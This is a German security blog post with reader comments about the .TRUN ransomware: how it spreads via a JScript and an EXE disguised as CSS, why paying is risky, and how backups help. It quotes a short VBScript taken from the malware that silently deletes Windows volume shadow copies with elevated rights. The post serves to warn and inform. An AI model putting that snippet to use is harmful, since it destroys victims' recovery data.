Crypto-Trojaner die Zweite: .TRUN der (noch) Unbekannte

Nachdem ich gestern den Artikel Crypto-Trojaner die Erste: Win.Trojan.Ramnit publiziert hatte und heise.de über die mp3-Variante von TeslaCrypt berichtete, nun mein Teil 2. Es geht um den Verschlüsselungs-Trojaner .TRUN, der von Virenscannern (noch) nicht erkannt wird.


Anzeige

Vorweg: Das ist auch wieder eine Story vom "hear say", könnte mir wie hier vorgeworfen werden. Aber: Ist der Ruf erst ruiniert, bloggt es sich gänzlich ungeniert – und bei den Sicherheitsthemen steckt Herzblut drin – man kann nicht genug darüber berichten und aufklären. Zudem ist die Quelle valide: Ex MVP, MVP-Pendant bei HP in den Foren, lange als freiberuflicher Dienstleister unterwegs und nun im Support eines solchen für die schwierigeren Fälle zuständig. Eine wandelnde Fundgrube an Wissen – und auch noch Debug-Spezi (ich habe mich so 1985 aus dem Thema Tracing auf Maschinencodeebene ausgeklinkt).

Ein kleiner Nebensatz und ein Sack Reis fällt um …

Ich gestehe, mein Physikstudium liegt zu lange zurück, so dass ich mich nicht mehr mit Chaos-Theorie befassen konnte. Was ich mir aber gemerkt habe: Der Flügelschlag eines Schmetterlings kann dazu führen, dass wir im Regen ersaufen – übertrieben dargestellt. Oder ein Sack Reis, der in China umfällt, löst hier ein Beben aus …

Es war nur eine kleine Diskussion zwischen Michael B. zu meinem Beitrag hinsichtlich der Treiberinstallation auf Google +. Ich hatte ihn nach zurückgezogenen Intel RST-Treibern gefragt, aber seine Antwort lautete:

Habe da bisher noch nicht weiter geschaut, steht aber auf der Liste. Habe gestern & heute mit .TRUN gewurschtelt und das Einfallstor / Script inkl. URL und Keys, VBS, JS, Exe getarnt als CSS ausfindig gemacht; entschlüsseln kanns derzeit noch niemand leider :(  und kein Virenscanner erkennt das Zeug!

Bam! Der berühmte Flügelschlag, der mich sofort hellwach werden ließ. Es gibt also was, was unter dem Namen .TRUN daherkommt und offenbar nicht gut ist.


Anzeige

VSS werden per WSH-Script gelöscht

Ich hatte ja im gestrigen Beitrag darauf hingewiesen, dass der Ramnit-Trojaner die Systemwiederherstellung des befallenen Systems blockiert. Bei .TRUN ermöglicht folgendes, von Michael Bormann gepostete, VBscript-Progrämmchen das Löschen der Volumenschattenkopien (VSS), die für die Wiederherstellung benötigt werden.

Set objShell84bej5os = CreateObject("Shell.Application")
Set objWshShell = WScript.CreateObject("WScript.Shell")
Set objWshProcessEnv = objWshShell.Environment("PROCESS")
objShell84bej5os.ShellExecute "wmic.exe", "shadowcopy delete /nointeractive", "", "runas", 0

Es sei angemerkt, dass dieses Script unter Windows Script Host (CScript.exe) mit Administratorberechtigungen ausgeführt werden muss. Dann sind die VSS-Kopien mit den vorherigen Daten weg. Bei Systemdateien klappt eine Systemwiederherstellung nicht mehr – bei Dokumentdateien wäre die Funktion "Vorherige Dateiversionen" machtlos. Und offenbar schaffen es Anwender, die Sicherheitsnachfrage der Benutzerkontensteuerung einfach mal abzunicken …

Einfallstor: Script mit URL, VBS, JS, EXE als CSS getarnt

Michael hat in seinem Posting noch darauf hingewiesen, welches Einfallstor .TRUN nutzt. Dort kommt neben einer .exe-Datei, die als CSS getarnt ist, auch das obige Script sowie VBScript- und JScript-Code zum Einsatz. Michael schrieb, dass kein Virenscanner die Ransomware erkenne – und wie ich ihn kenne, hat er wohl auch Virustotal bemüht.

Michael B. hat hier noch eine kleine Ergänzung geliefert – das Script wird per RunDLL gestartet, der Nutzer muss nur einmal ein JScript zur Ausführung freigeben.

Das Script wurde via rundll32 nach jedem encrypt einer Datei gestartet, als Prozess einer DLL die die Dateien verschlüsselt. Nur ein initiales JS Script musste der Anwender starten, das war es dann.

Google fördert einige aktuelle Treffer zu Tage

Eine Suche in Google nach ".TRUN Trojaner" förderte gleich einige aktuelle Treffer zu Tage. Hier mal eine Fundstelle im trojaner-board.de – und im Chip-Forum ist eine gute Beschreibung der "Bewerbungs-Mail" zu finden. Auch bei gutefrage.net schlagen Leute auf. Die restlichen Treffer zum "entfernen" lasst ihr bitte links liegen – sind mal wieder automatisch übersetzte Schnipsel von Ami-Seiten, die viel versprechen, den Leuten das Geld aus der Tasche locken wollen und deren Tools nicht mal mit der Kneifzange angefasst werden sollten.

Eine Seitenhieb auf dieses Google kann ich mir an dieser Stelle nicht verkneifen. Die Dumpfbacken in der Adsense-Abteilung machen sich Gedanken, dass ich Anzeigen umgestalten solle, um 15% mehr Anzeigenannahmen zu erreichen (bisheriger Ertrag einer solchen Anzeige: 0,01 Euro). Oder man schwafelt darüber, künftig Webseiten, die nicht per https ausliefern, abzustrafen. Gleichzeitig wird aber der größte Schrott an automatisch übersetzten Artikeln in den vorderen Rankings ausgeworfen. Es lebe die Macht der Algorithmen im Google Universum …

Zudem reicht "entfernen" nicht, denn der Trojaner verschlüsselt die Benutzerdateien und versieht diese mit der Dateinamenerweiterung .TRUN. Man könnte, wie die Meldungen suggerieren, dem Erpresser Kohle rüber schicken und hoffen, dass man den Entschlüsselungscode erhält. Aber das ist eine riskante Sache (siehe) – sollte man nie tun!

Bei Dateidaten, die vor der Infizierung liegen, kann es sein, dass das Umbenennen der Erweiterung .TRUN in die vorherige Dateinamenerweiterung die Inhalte wieder lesbar macht. Ist aber heikel, da eine infizierte Exe-Datei möglicherweise den Trojaner wieder scharf stellt. Die Lösung: Windows neu aufsetzen oder ein Backup, welches Trojaner-frei ist, einspielen. Also alles, wie im gestrigen Beitrag Crypto-Trojaner die Erste: Win.Trojan.Ramnit.

Ähnliche Artikel:
Ransom-Malware legt Klinikbetrieb lahm
Crypto-Trojaner die Erste: Win.Trojan.Ramnit
Sicherheitslücke in Trend Micro-Schutzsoftware
Neue Android SLocker-Ransomware-Variante
Sicherheitsinfos zum Wochenende
Rettungsanker, falls Windows nicht mehr bootet
Ständige "Freezes" in Windows 7


Anzeige

Dieser Beitrag wurde unter Sicherheit, Virenschutz abgelegt und mit , , , verschlagwortet. Setze ein Lesezeichen auf den Permalink.

13 Antworten zu Crypto-Trojaner die Zweite: .TRUN der (noch) Unbekannte

  1. Dekre sagt:

    Info: jetzt gibt es auch wieder neue sog. Decrypter. Der neueste von Emsisoft, Bleppingcomputer berichtete gerade.
    Auf bleepingcomputer.com findet man alle Decrypter für Leute die davon betroffen sein sollten, auch für Teslacrypt (wohl aber noch nicht für den mp3-Crypter?). Immer mal dort schauen, für Leute, die da was haben.

  2. Herr IngoW sagt:

    Hallo
    ich habe alle Dateien auf dem Stick bzw. auf einer externen Platte (bzw. Nas), es sind nur Programme auf dem PC / Laptop, da hoffe ich das im großen und Ganzen alles Relativ sicher ist.
    Vorsicht bei E-Mail's kann auf jeden Fall nicht schaden und nicht auf dubiosen Web-Seiten surfen. Vor allen dingen nicht alles anklicken um irgendwohin zu gelangen oder um was herunter zu laden (da wird immer auf ja (ok) geklickt ohne zu lesen (dauert zu lange). Man kann sich aber trotzdem was einfangen.
    Also Augen auf!
    So wie Günter es beschrieben hat ist es oft (hatte ich auch schon bei Bekannten & anderen) und wenn man was wissen will was gemacht wurde kommt meist die Antwort "keine Ahnung wie das passieren konnte ich hab doch Garnichts gemacht". Auf den PC's / Laptop's meist das "geordnete" Caos, Vieren-Software abgelaufen (wenn überhaupt vorhanden) keine Updates usw.. Und dann ist alles im…………….
    Diese Dinger sind schon schrecklich!

  3. Grundsätzlich: Wer sich eine solche Beigabe eingefangen hat, hat ein Sicherheitsproblem – und die Ransomware wird zunehmen, da das Geschäftsmodell trägt.

    Die Hoffnung auf einen Decryptor ist imho trügerisch – das Teil hilft nur dann, wenn der Betroffene einen Schlüssel (gegen Zahlung) bekommen hat – oder wenn der Ransomware-Entwickler geschlampt hat. Kommt vor, aber die Dinger werden immer besser.

    Einzige Hoffnung: Man hat eine saubere Backup-Strategie mit Sicherungsmedien, die nicht ständig im Zugriff sind (NAS und Cloud zähle ich nicht unbedingt dazu).

    • Herr IngoW sagt:

      Hm da muss ich das NAS wohl weglassen, für wichtige Dateien, ansonsten ist ja alles noch mal auf der externen Festpatte ein zweites mal vorhanden (auch zur Sicherheit falls das NAS bzw. die Platte darin mal schlapp macht). Ich hoffe das das dann ausreicht.
      Hoffen wir mal das die Sicherheits-Programme diese nervigen und vor allem für manche Anwender teure Sachen bald erkannt werden.

  4. Also ich mache inkrementelle Backups 2x die Woche auf eine interne Festplatte Festplatte die ich aber zuvor erst einschalten mit einem HDD Power Switch einschalten muss, hängt an einem so ein teil hatte ich schon in meinem Alten Rechner um Interne IDE Festplatten aus sowie einzuschalten, damit werden die Festplatten nicht mal im BIOS gefunden, da hängt auch noch ein zweites Betriebssystem mit Datenfestplatte dran.
    Ich denke mal das ist eine sehr sichere Idee, toy toy toy hatte ich noch nie so eine Ransomware mir eingefangen, im übrigen werden auch Daten auf Netzlaufwerke auch gleich mit verschlüsselt soviel ich darüber gelesen habe, ich weiß nicht wie das bei einen Linux Samba Server aussieht oder zb. OneDrive oder MagentaCLOUD bei einem per webdav eingebundenen Netzlaufwerk Laufwerk aussieht habs nie getestet.

    • Dekre sagt:

      Das ist interessant und für mich eine gute Überlegung wert. Ich sichere nach mehreren anderen Test mit Netzwerksysteme (so MY Cloud von WD, man kann dann nichts einspielen mehr) nun wieder mit USB-Festplatte WD MY Passport Ultra über die Windows-7-Bordmittel.

      • Das Teil gibts noch mal in einer 4-fach HDD Power Switch Version, da ich jedoch zu jeder SSD auf der Ein Betriebssystem Installiert ist noch eine Datenfestplatte habe ich mich zu einer 6-fach HDD Power Switch entschieden um die Betriebssysteme komplett von einander Trennen zu können, daneben habe ich dann halt noch 2x 2TB Festplatten die ich per HotSwap auswerfen und anschließend Abschalten kann, dann ist die Strom und SATA Verbindung unterbrochen.
        Hier gibts noch ein etwas besseres Bildchen http://i00.i.aliimg.com/img/pb/840/757/482/482757840_735.jpg
        Fand das unter Ultra SCSI immer schon geil platten im Laufenden Betrieb auszuwerfen, aber gute SCSI Controller oder SAS Controller sind halt wahnsinnig Teuer, das teil bietet eine gute Kostengünstige alternative.

  5. Michael Bormann sagt:

    Moin,

    der Decryptor auf Bleepingcomputer genannt kann nur seine Arbeit aufnehmen liegt ein unverschlüsseltes !identisches! Dokument vor was derzeit durch Löschen der VSS eben nicht gegeben ist.
    Wer da kein Backup hat der ist seine Dateien vorerst einmal los.
    Säubern lässt sich die befallene Maschine schon was nicht so sehr das Problem darstellt aber die Dokumente sind vorerst nicht nutzbar.
    Das Arbeitspferd, die .css (angeblich) ist noch nicht bekannt bei Virustotal

    https://www.virustotal.com/de/file/ff4979980b00773c414c3cd5571eae8cc3916d3607e9621400f0302f1e138882/analysis/1455525485/

  6. Dekre sagt:

    Malwarebytes entwickelt gerade so einen Warner vor Ramsonware. Den kann man auch in den jeweiligen Beta-Versionen mal ausprobieren.
    Ich kann aber nur abraten, diesen auf einen PC einzusetzen, den man für die Arbeit braucht. Es sind Beta-Versionen und die werden seit ca. 3 Wochen getestet und man kann auf Malwarebytes-Forum dann mithelfen etc.
    Diese beta-Versionen sind aber noch nicht ausgereift !!. Deshalb nur der Hinweis für Interessierte.

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert

Hinweis: Bitte beachtet die Regeln zum Kommentieren im Blog (Erstkommentare und Verlinktes landet in der Moderation, gebe ich alle paar Stunden frei, SEO-Posts/SPAM lösche ich rigoros). Kommentare abseits des Themas bitte unter Diskussion.

Du findest den Blog gut, hast aber Werbung geblockt? Du kannst diesen Blog auch durch eine Spende unterstützen.